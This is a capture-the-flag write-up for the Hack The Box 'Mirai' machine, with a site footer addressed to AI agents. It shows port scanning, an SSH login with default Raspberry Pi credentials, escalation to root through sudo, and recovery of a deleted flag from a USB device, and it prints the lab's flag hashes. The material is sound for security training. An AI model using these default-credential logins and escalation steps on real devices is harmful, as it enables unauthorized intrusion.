# Mirai ![](/files/LI45tkM3CrsaVlft1HJo) ## Enumeration As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports. The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file: > nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.48 -oN allPorts * `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections. * `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second. * `-p-` scanning the entire port range, **from 1 to 65535**. * `-T5` **insane** mode, it is the fastest mode of the nmap time template. * `-Pn` assume the host is **online**. * `-n` scan without reverse **DNS** resolution. * `-oN` **save** the scan result into a file, in this case the *allports* file. ``` # Nmap 7.92 scan initiated Tue May 24 15:02:48 2022 as: nmap -sS -p- --min-rate 5000 -Pn -oN allPorts 10.10.10.48 Nmap scan report for 10.10.10.48 Host is up (0.061s latency). Not shown: 65529 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http 1490/tcp open insitu-conf 32400/tcp open plex 32469/tcp open unknown # Nmap done at Tue May 24 15:03:08 2022 -- 1 IP address (1 host up) scanned in 20.27 seconds ``` Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file: > nmap -sC -sV -p22,53,80,1490,32400,32469 10.10.10.48 -oN targeted * `-sC` performs the scan using the default set of **scripts**. * `-sV` enables **version** detection. * `-oN` **save** the scan result into file, in this case the *targeted* file. ``` # Nmap 7.92 scan initiated Tue May 24 15:04:37 2022 as: nmap -sCV -p22,53,80,1490,32400,32469 -Pn -oN targeted 10.10.10.48 Nmap scan report for 10.10.10.48 Host is up (0.038s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0) | ssh-hostkey: | 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA) | 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA) | 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA) |_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519) 53/tcp open domain dnsmasq 2.76 | dns-nsid: |_ bind.version: dnsmasq-2.76 80/tcp open http lighttpd 1.4.35 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). |_http-server-header: lighttpd/1.4.35 1490/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50) 32400/tcp open http Plex Media Server httpd |_http-title: Unauthorized | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Server returned status 401 but no WWW-Authenticate header. |_http-favicon: Plex |_http-cors: HEAD GET POST PUT DELETE OPTIONS 32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue May 24 15:04:59 2022 -- 1 IP address (1 host up) scanned in 22.74 seconds ``` If we scan the web server with the whatweb tool, we'll see that it has an uncommon header called `x-pi-hole`. {% hint style="info" %} **Pi-hole** is a Linux network-level advertisement and Internet tracker blocking application, which acts as a DNS sinkhole and optionally a DHCP server, intended for use on a private network. It is designed for low-power embedded devices with network capability, such as the Raspberry Pi. {% endhint %} > whatweb ``` http://10.10.10.48 [404 Not Found] Country[RESERVED][ZZ], HTTPServer[lighttpd/1.4.35], IP[10.10.10.48], UncommonHeaders[x-pi-hole], lighttpd[1.4.35] ``` ## Exploitation As the *Pi-hole* server might be running on a *Raspberry Pi*, and port 22 (SSH) is open, we could try the default credentials for *Raspberry Pi* devices, which are the user `pi` and the password `raspberry`. Once we are logged in, we could grab the user flag. > sshpass -p "raspberry" ssh pi\@10.10.10.48 ``` The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue May 24 14:06:54 2022 from 10.10.14.3 SSH is enabled and the default password for the 'pi' user has not been changed. This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password. SSH is enabled and the default password for the 'pi' user has not been changed. This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password. pi@raspberrypi:~ $ whoami pi pi@raspberrypi:~ $ cat Desktop/user.txt ff837707441b257a20e32199d7c8838d ``` ## Privilege Escalation We could try to list the *sudo* privielges of the `pi` user. > sudo -l ``` Matching Defaults entries for pi on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User pi may run the following commands on localhost: (ALL : ALL) ALL (ALL) NOPASSWD: ALL ``` And we can execute any command as the *root* user. Let's get a shell as root. > sudo su If we try to get the root flag, we'll get the following message. > cat /root/root.txt ``` I lost my original root.txt! I think I may have a backup on my USB stick... ``` If we list the system devices, we'll see the `/dev/sdb` device mounted on `/media/usbstick`. > df -h * `-h` **human** readable. ``` Filesystem Size Used Avail Use% Mounted on aufs 8.5G 2.8G 5.3G 35% / tmpfs 100M 4.8M 96M 5% /run /dev/sda1 1.3G 1.3G 0 100% /lib/live/mount/persistence/sda1 /dev/loop0 1.3G 1.3G 0 100% /lib/live/mount/rootfs/filesystem.squashfs tmpfs 250M 0 250M 0% /lib/live/mount/overlay /dev/sda2 8.5G 2.8G 5.3G 35% /lib/live/mount/persistence/sda2 devtmpfs 10M 0 10M 0% /dev tmpfs 250M 8.0K 250M 1% /dev/shm tmpfs 5.0M 4.0K 5.0M 1% /run/lock tmpfs 250M 0 250M 0% /sys/fs/cgroup tmpfs 250M 8.0K 250M 1% /tmp /dev/sdb 8.7M 93K 7.9M 2% /media/usbstick tmpfs 50M 0 50M 0% /run/user/999 tmpfs 50M 0 50M 0% /run/user/1000 ``` Let's take a look at the `/media/usbstick` directory. > ls -la /media/usbstick ``` total 18 drwxr-xr-x 3 root root 1024 Aug 14 2017 . drwxr-xr-x 3 root root 4096 Aug 14 2017 .. -rw-r--r-- 1 root root 129 Aug 14 2017 damnit.txt drwx------ 2 root root 12288 Aug 14 2017 lost+found ``` There is the `damnit.txt` file with the following message. > cat /media/usbstick/damnit.txt ``` Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back? -James ``` But if we print the string of the `/dev/sdb` device, all we have to do is reap the harvest and take the root flag. > strings /dev/sdb ``` >r & /media/usbstick lost+found root.txt damnit.txt >r & >r & /media/usbstick lost+found root.txt damnit.txt >r & /media/usbstick 2]8^ lost+found root.txt damnit.txt >r & 3d3e483143ff12ec505d026fa13e020b Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back? -James ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://alfa8sa.gitbook.io/htb-writeups/linux-machines/mirai.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.